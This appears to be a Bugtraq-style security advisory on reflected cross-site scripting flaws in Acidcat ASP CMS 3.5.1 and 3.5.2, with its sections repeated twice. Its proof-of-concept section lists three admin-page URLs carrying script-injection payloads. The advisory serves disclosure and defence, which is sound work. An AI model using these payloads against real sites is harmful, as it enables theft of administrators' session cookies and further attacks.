Acidcat ASP CMS Multiple Cross Site Scripting Vulnerabilities
BID:51608
Info
Acidcat ASP CMS Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 51608 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 21 2012 12:00AM |
| Updated: | Jan 21 2012 12:00AM |
| Credit: | Avram Marius Gabriel from RandomStorm |
| Vulnerable: |
Acidcat ASP CMS 3.5.2 Acidcat ASP CMS 3.5.1 |
| Not Vulnerable: | |
Discussion
Acidcat ASP CMS Multiple Cross Site Scripting Vulnerabilities
Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Acidcat ASP CMS 3.5.1 and 3.5.2 are vulnerable; other versions may also be affected.
Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Acidcat ASP CMS 3.5.1 and 3.5.2 are vulnerable; other versions may also be affected.
Exploit / POC
Acidcat ASP CMS Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following URIs are available:
http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script>
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following URIs are available:
http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script>
Solution / Fix
Acidcat ASP CMS Multiple Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Acidcat ASP CMS Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Acidcat ASP CMS Homepage (Acidcat)